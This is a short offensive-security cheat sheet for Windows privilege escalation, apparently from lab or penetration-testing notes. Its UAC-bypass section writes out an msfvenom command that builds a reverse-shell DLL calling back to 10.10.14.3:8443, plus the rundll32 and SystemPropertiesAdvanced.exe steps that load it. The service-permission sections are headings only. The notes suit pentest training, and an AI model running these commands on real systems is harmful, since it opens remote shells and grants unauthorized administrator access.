OS Attacks
User Account Control (UAC)
Confirming UAC Enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUAChecking UAC Level (When Enabled)
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdminhttps://github.com/hfiref0x/UACME
Bypassing UAC (Method)
# Checking Path Variable
cmd /c echo %PATH%
# Generate Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll
# Test Reverse Shell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll
# Execute UAC
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exeWeak Permissions
Weak Permission Audit
https://github.com/GhostPack/SharpUp/
Manually Permission Check
1 Replace Service Bin Path
2 Restart Service
Unquoted Service Path
Find Unquoted Service Paths
Check Weak Service ACL (Accessschk.exe)
Modify Image-Path
Vulnerable Services
Gather Installed Programs
Gather Running Service
PoC
Last updated